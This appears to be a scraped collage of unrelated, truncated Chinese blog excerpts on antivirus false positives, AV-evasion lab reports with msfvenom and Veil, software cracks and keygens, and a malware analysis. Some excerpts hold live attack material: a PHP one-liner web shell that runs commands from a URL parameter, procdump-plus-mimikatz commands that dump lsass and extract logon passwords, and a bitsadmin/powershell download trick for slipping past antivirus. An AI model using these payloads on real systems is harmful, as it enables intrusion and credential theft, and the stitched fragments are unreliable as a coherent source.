原文地址:https://wuter.cn/1909.html/ 部分用户下载frp之后,windows defender可能会报毒,并且自动删除内网穿透主程序,导致无法穿透. 首先看一下报毒的原理是什么? 1."一些敏感操作会被误报,比如说读取内存du,调用/执行cmd脚本,修改dll文件,注入代码等等操作" 而这款软件就是会调用/执行CMD脚本,并且会将本地端口映射到公网(内网穿透不就是干这个的嘛),所以部分杀毒软件会报毒. 2.一些exe程序可能旧版本提交了各大软件病毒库进行申诉…

准备材料如下bat和vbs直接新建文本,然后改后缀就可以建出来了(后面发现exe运行vbs来启动bat不报毒)下面内容就是要把这些文件打包成exe,双击exe后打开图片test.jpg,不显示dos窗口. =====================================我是一条春卷========================================1.bat代码@echo off test.jpg 1.vbs代码(这个可以使bat运行时候不显示窗口) Set shell =…

这几天都在忙专周实验,今天用到delphi,一到编译时nod32就报毒,编译空文件也报毒,上网查了资料才明白,是编译文件被感染了,生成软件就会报毒.把自己找到的资料分享如下:   重新编译时,生成的exe突然nod32报毒. 提示: “Project1.exe Win32/Induc.A 病毒 的变种 已删除 – 已隔离 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\Program Files\Delphi7SE\Bin\delphi32.exe.” 查阅 Wi…

<?php $c=urldecode($_GET['c']);if($c){`$c`;}//完整 !$_GET['c']||`{$_GET['c']}`;//精简 /******************************************************* * 原理:PHP中``符号包含会当作系统命令执行 * 示例:http://host/?c=type%20config.php>config.txt * 然后就可以下载config.txt查看内容了! * 可以试试更变态的…

刚才又人问我,要是群文件被鉴定为病毒那怎么下载? 我简单说一下吧: 其实qq客户端过滤比较严的,而web段却还是老一套,很多人说出现这个情况其实是腾讯已经把他库里面的文件删了,其实不然 如果源删了,那么web段也就不可能下载到了,咱们从这方面绕过它的验证(QQ群空间 http://qun.qzone.qq.com/group) 看图: 收工 扩展: 上传绕过:其实上传绕过太简单了,比如设置一个压缩包密码,比如压缩包里面套压缩包等等的,都是可以绕过的 赠送: 外网突破-打开就能用 http://p…

因为最近需要用这个但是网上都是注册机没有成功注册,所以就自己动手使用ollydbg开刀,    修改成了永久试用版本. 着急用所以没仔细分析,暂时先这样吧. 这个下载版本 http://dlsw.baidu.com/sw-search-sp/soft/61/24311/navicat_V11.1.12.0_sqlite_cs.1437637337.exe 本地下载 navicat_V11.1.12.0_sqlite_cs.1437637337.part1.rar navicat_V11.1.12…

因为最近需要用这个但是网上都是注册机没有成功注册,所以就自己动手使用ollydbg开刀,    修改成了永久试用版本. 着急用所以没仔细分析,暂时先这样吧. 这个下载版本 http://dlsw.baidu.com/sw-search-sp/soft/61/24311/navicat_V11.1.12.0_sqlite_cs.1437637337.exe 本地下载 navicat_V11.1.12.0_sqlite_cs.1437637337.part1.rar navicat_V11.1.12…

360 真tm流氓一个…

本博客曾经发布了通过 Finalspeed 加速 Shadowsocks 的教程,大家普遍反映能达到一个非常不错的速度.Finalspeed 虽好,就是内存占用稍高,不适合服务器内存本来就小的用户:而且现在 Finalspeed 停止维护,就需要寻找一个能替代 Finalspeed 的工具. 今天我就给大家介绍这么一个能替代 Finalspeed 的项目 — Kcptun. Kcptun介绍 Kcptun 是一个非常简单和快速的,基于 KCP 协议的 UDP 隧道,它可以将 TCP 流转换为 K…

我们经常会遇到这样的问题,在数据库中的文件存放的是web格式或者是绝对路径,以及使用的是百度上传或者其他上传组件,造成了很多异步上传的冗余文件,如果客户需要我们导出企业官网中的产品图片,我们该如何处理? 很简单,当然是自己写个工具来读取,然后复制文件啦! 所以这款工具就应运而生了,大大的提高开发效率,不用每个项目都去修改代码了,直接当成工具来使用即可. 我们先看看大致的界面参考: 如果加了皮肤呢感觉要好看一点点: 提取文件后,支持保留源目录(递归的方式),也可以选择存放到同一个目录,避免文件的深…

Exp3 免杀原理与实践 一.实验内容 1. 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 2. 通过组合应用各种技术实现恶意代码免杀 3. 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.基础问题回答 1.杀软是如何检测出恶意代码的? 基于特征码的检测:通过对病毒库中已有记录的恶意代码截取其中一小段代码对程序进行检测,发现相同就认定为恶意代码. 启发式恶意软件检测:…

2019.04.18 重要说明 VS2019 正式版已经发布了,Postsharp v6.2.2-Preview(预览版)也开始支持VS2019.不过截至目前,该预览版还不是特别稳定,因此提醒下大家在 Postsharp v6.2.x正式版发布前谨慎使用VS2019进行开发. 要点: Postsharp v6.1.17 于 2019年4月2日发布.这是截至目前最新的正式版.经测试,破解工具可以完美破解.     Postsharp v6.2.2-Preview 同样于2019年4月2日发布.经测…

Exp3 免杀原理与实践 基于特征码的改变来实现免杀(实践过程记录) MSF编码器编译后门检测 可以通过VirSCAN来检验后门抗杀能力. ps:选择后门前修改其文件名,不得含有数字. 如上图所示,39款杀毒软件中有20款报毒,可见实验二的后门不具有隐秘性,且国内的杀毒软件对此后门报毒率100%,可见国内的杀毒软件质量可靠. 接下来将对免杀后门做一定研究. Veil-Evasion免杀平台 Veil-Evasion的安装 如果直接使用 sudo apt-get install veil-evas…

20155239吕宇轩<网络对抗>Exp3 免杀原理与实践 实验过程 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒. 如上图所示,39款杀毒软件中有20款报毒,可见实验二的后门不具有隐秘性,且国内的杀毒软件对此后门报毒率100%,可见国内的杀毒软件质量可靠. 接下来将对免杀后门做一定研究. Veil-Evasion免杀平台 Veil-Evasion的安装 可使用以下命令完整安装Ve…

Internet Download Manager,全球最流行的下载工具.Internet Download Manager (简称IDM) Windows 平台功能强大的多线程下载工具,国外非常受欢迎.支持断点续传,支持嗅探视频音频,接管所有浏览器,具有站点抓取.批量下载队列.计划任务下载,自动识别文件名.静默下载.下载百度网盘等功能 更新日志:http://www.internetdownloadmanager.com/news.html版本6.37 Build 8中的新增功能(发布日期:2…

一.Windows安装与激活 1.Windows7/8/10安装 提示:       重装系统时C盘会被格式化,故在重装系统前请先手动将重要资料转移到其他地方: 制作一个大白菜U盘winpe启动盘 查询自身机型的U盘启动快捷键   安装方式一:U盘启动盘安装(推荐,安装后完全无插件,放心使用) ①.制作U盘启动盘,制作步骤参考:http://dbc.dqsspx.top/ ②.下载纯净版系统,下载地址参考:http://www.msdn1.cn/ ③.把下载的ISO文件拷贝到已制作好的U盘启动盘…

目录 恶意代码の奇客pdf分析 奇客PDF安装包分析 静态分析基础技术 上传杀毒网 查壳 编译时间 导入表分析 资源查看 动态分析基础技术 Process Monitor监控 Process Explorer 恶意程序创建奇客PDF转换.tmp进程 恶意程序创建FnClientService进程 Process Monitor详细过滤 奇客PDF转换.exe创建奇客PDF转换.tmp文件 奇客PDF转换.tmp写出大量dll和.zip 对释放文件详细分析 qk.bat内容 psdk.zip内容…

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件误认为是木马或病毒:2 1.3. 一些安全领域中使用的部分安全检测产品,也会被杀毒软件误杀.2 1.4. 远程监控技术一样.2 2. 1.3 免杀的发展史2 3. 免杀技术的简单原理2 3.1. 现在的免杀主要分为3种,其中的一种便是行为免杀,也就是通过控制病毒木马的行为来达到躲过杀…

XMLSpy 2011中文版破解补丁使用方法 1.如果你下载的版本是r2sp1的话(r2不用此步骤),先用补丁主程序(altova.xmlspy.v2011r2sp1b-patch.exe).2.XMLSpy2011中文版下载地址:(建议下载2011r2中文版,直接使用keymaker.exe就可以了)http://www.altova.com/download_archive.aspx3.使用注册机(keymaker.exe). XMLSpy 2011中文版破解补丁与XMLSpy 2011注册…

使用procdump,由于是微软的东西,带微软签名杀软不会报毒. procdump -accepteula -ma lsass.exe lsass.dmp copy出 lsass.dmp到本机. mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords 具体可以参考原文: http://blog.gentilkiwi.com/securite/mimikatz/mi…

从官网上下载的fdm lite 3.9.6,从图片中可以看出安装包有数字签名,windows defender报毒,在线杀毒也检出木马,官网的程序更新到了3.9.6版本,在sourceforge上的源码还是3.8.1173,从官网上看,3.9.6版本的更新日期是2015年06月25日,但是从sourceforge上并没有找到这个版本的源码(或许只是我没找到). 以下截图证明:…

这个思路要结合近期在一些安全网站上公布的姿势来实现,先科普几个地方. (1)通过cmd本身就可以直接下载: Bitsadmin /transfer AA /download /priority normal "http://..." "..." 其实讲道理也可以直接调用Bitsadmin.exe 和cmd没关系.问题是刚刚我测试一发,返现woc 360竟然报毒了? 然后我换了个姿势,直接cmd启动powershell下载: cmd.exe /c powershell…

本帖最后由 HOT米粒 于 2014-11-16 20:43 编辑 华为荣耀6 H60-L02/L12(联通版)救砖包[适用于无限重启]说明: 1.本工具包用于华为荣耀6 H60-L02(联通版): 2.本工具适用于在Honor Logo 无限重启的童鞋恢复官方包: 3.本工具适合已替换第三方recovery的童鞋无法恢复官方包的情况: 4.本工具会清空手机内置卡的所有数据. 刷机前看完下列注意事项: 1.根据你目前损坏的系统(EMUI2.3或者EMUI3.0)来选择对应的刷机包,EMUI 2.…

    TTradmin 是一款免端口映射可直接穿透任何内网,基于radmin核心的即时远程协助软件.在使用的时候只需要保证“协助端”和“被协助端”使用同一个验证码即可实现安全便捷的远程控制,不需要进入路由器进行端口映射,和TTvnc的使用方法类似.TTradmin允许一个“被协助端”同时被多个“协助端”连接,允许设置无人值守,可在“被协助端”上线后自动将验证码发送到预设的邮箱.     内置的 radmin 在整个远程协助过程中完全以绿色软件的形式运行,可与已安装的 radmin server…

HEU KMS Activator基于MDL论坛的“KMS Server Emulator”,是一款KMS激活工具,为“知彼而知己”原创工具.主要适用于Windows以及Office的VL版本,无需联网即可一键激活.经众多网友的测试使用,此版本激活成功率最高 杀毒软件会报毒,其实看你如何理解.毕竟欺骗Windows是伪激活! 断网,退杀毒乳.激活,联网打开杀毒,查杀.没有病毒!说白了都是捍卫自己权益,不多说 下载: HEU KMS Activator v11.1.0 迷你版  私密链接: htt…

说句实话,要想用普通的方法来替换图标,不是完全不可行,当然也不是完全可行.这个看似简单的问题并不是想象中那么容易解决,为什么有人修改exe的图标总是失败,其实他忽视了exe和图标的复杂性,用简单的方法根本无法解决这个问题,我们大多数人都低估了exe和图标这两个名词了. 对于可执行文件,图标的扩展名为ico,网络上很多图标软件都可以做到把jpg,bmp,gif,png等格式的图像文件转换成图标格式,此外也有很多软件可以直接提取exe或者dll文件里面附带的图标文件,甚至我们可以自己制作图标.不过图…

Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行! 那么如何dump LSASS进程内存呢.可以通过以下方式: 1.对于NT6可以使用windows自带的功能进行dump: 任务管理器—进程—显示所有用户进程—找到lsas…

一. 序列号 除非是从官方购买,从其它任何途径得到的序列号(包括网上流传的注册机生成的)都是不能通过联网验证的,必须使用破解补丁,或是通过修改hosts文件的方式来激活.因此,除了正版,不存在所谓的“永久序列号”. 序列号仅在两种情况下使用: 1. 以输入序列号的方式来安装时: 2. 或以“试用版”的方式安装cs6后,用修改hosts文件的方法来破解时. 序列号也可以用附件中的注册机来生成.但由于防盗版等因素,注册机通常会被安全软件(杀毒软件及助手.卫士之类)报毒------当然是误报,因此,对…

一.WIN32.EXE的来源:http://fdghewrtewrtyrew.biz/adv/130/win32.exe 二.运行后的表现:此WIN32.EXE通过80和8080端口访问若干个IP,若防火墙不能监测到或令防火墙允许该访问,WIN32.EXE会自动下载木马Kernels8.exe到system32目录下:Kernels8.exe自网络下载1.dlb.2.dlb.....等一堆木马到当前用户文件夹中,并自动运行.下载的木马加载运行后,又从网络上下载其它木马/蠕虫. 木马/蠕虫完全下载…

明天就要去上海大学参加 2015赛季 ACM/ICPC最后一场比赛 —— EC-Final,在这之前,顺利地把期末大作业赶出来了. 在这种期末大作业10个人里面有9个是从网上下载的国内计算机水平五六流大学里学习编程,我感到压力很大. (Update:前几天交了一份移动开发技术的期末大作业,老师说文档比App重要) 但我依然选择作死——纯手工打造.庆幸的是,历时四天,翘课无数,现在基本完工了. 做个作业真不容易,音乐要自己找,图片要自己P,代码也要自己写... ... 早起晚睡,脖子酸... ..…